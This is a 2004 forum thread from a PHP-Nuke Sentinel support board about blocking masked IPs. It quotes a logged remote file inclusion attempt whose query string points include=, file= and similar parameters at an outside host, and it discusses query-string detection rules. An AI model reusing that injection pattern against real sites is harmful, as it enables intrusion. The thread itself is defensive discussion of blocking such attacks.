If an IP address is withheld- can we block?

Posted: Sun Jun 13, 2004 4:04 pm

Just a thought; there are some software programs that hide your ip, etc. to a cserain extent. I am not sure how well these work; or how they work.

If they do work (and an IP address is not shown- I get a lot of "xxxxxxxxxxxxx" in my server logs) is it possible to stop this/ these from getting access to the site?

Site Admin/Owner Joined: Aug 27, 2002 Posts: 17088

Andy, I am totally lost with this post Confused

Can you explain some more what your point is? Also, how does this relate to Nuke?

Posted: Mon Jun 14, 2004 1:51 am

Ok. It is possible to withhold, or hide your IP address (masking?).

Is there anyway that we can set nuke (or Sentinel) to block access to a site IF the IP address is not clearly visible?

Hope that clears it up- if not, I'll try to find details of one of the software packages concerned...

Cheers.

Andy

Posted: Mon Jun 14, 2004 3:48 am

You can use a Proxy to 'hide' your true IP, yes, but then Sentinel(tm) will ban the proxy IP. Sentinel(tm) derives the IP in several ways using the HTTP protocol. The xxxxxxxx's you see in your logs still have an IP attached to them.

Posted: Thu Jul 08, 2004 12:59 am

Here's one:
The external linking thing is very common- see lots listed on here so don't see the need to keep adding more to your bandwidth....

That said, I take it Sentinel will block the Remote address? (62.221.221.7)

Top part of the mail below.....

Date & Time: 2004-07-07 21:39:59
Blocked IP: unknown
User ID: Anonymous (1)
Reason: Abuse - OTHER
--------------------
User Agent: curl/7.11.2 (i386-pc-linux-gnu) libcurl/7.11.2 OpenSSL/0.9.7 ipv6 zlib/1.2.1.1 Query String: [ Only registered users can see links on this board! Get registered or login! ]
set_albumName=http://217.59.104.226/&id=http://217.59.104.226/&op=http://217.59.104.226/
&name=http://217.59.104.226/&file=http://217.59.104.226/&include=http://217.59.104.226/
Forwarded For: unknown
Client IP: none
Remote Address: 62.221.221.7
Remote Port: 35828
Request Method: GET
--------------------
Who-Is for IP
OrgName: Unknown Works
OrgID: UNKNOW
Address: 3928 SE Tolman st
City: Portland
StateProv: OR
PostalCode: 97202
Country: US

Posted: Thu Jul 08, 2004 5:02 am

Yes, I had one like this also. We're looking into this. It should have blocked it but it didn't.

Posted: Thu Jul 08, 2004 6:05 am

Possibly the wrong forum for this (sorry), but as Sentinel looks for a particular string/ type with the UNION attacks, would it be possible to do something similar where the admin can put in a specific string to watch for and offer it as an option to block/ bounce/ etc?

In this instance the string would be something like "&include=http://217.59.104.226"- since the IP address concerned is causing some problems here (and everywhere else)- if somethings rears it's head in the future- say a different IP address needs to be added, and that can be bounced....

Personally I'd *love* to hammer the daylights out of anybody (or their PC) that attempts to do an extrnal link such as this...

The other option is to totally disable external URL's in the address bar; would this be a quick fix? (So it will only "fetch" from the domain name or a sub domain name)

Just a thought- thanks for your help and hard work on this so far......

Posted: Thu Jul 08, 2004 7:08 am

Sentinel traps the http= so, in this instance, it will catch ALL attempts to redirect when an address is detected in the QUERY string. However, I really like that idea about allowing strings to search for.

Posted: Thu Jul 08, 2004 9:54 am

Will try to get this feature added to 2.0.0 but it may have to wait for 2.1.0 .